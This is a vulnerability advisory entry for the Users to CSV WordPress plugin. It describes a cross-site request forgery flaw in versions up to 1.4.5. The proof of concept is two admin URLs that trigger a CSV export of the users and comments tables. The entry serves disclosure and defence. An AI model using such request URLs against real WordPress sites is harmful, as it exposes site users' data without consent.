WordPress Plugin Vulnerabilities
Users to CSV <= 1.4.5 - Cross-Site Request Forgery (CSRF)
Description
The users-to-csv WordPress plugin was affected by a Cross-Site Request Forgery (CSRF) security vulnerability.
Proof of Concept
http://www.example.com/wp-admin/users.php?page=users2csv.php&csv=true&table=users http://www.example.com/wp-admin/users.php?page=users2csv.php&csv=true&table=comments
Affects Plugins
References
Classification
Type
CSRF
OWASP top 10
CWE
Miscellaneous
Submitter
ethicalhack3r
Submitter twitter
Verified
No
WPVDB ID
Timeline
Publicly Published
2015-06-15 (about 8 years ago)
Added
2015-06-15 (about 8 years ago)
Last Updated
2019-10-21 (about 4 years ago)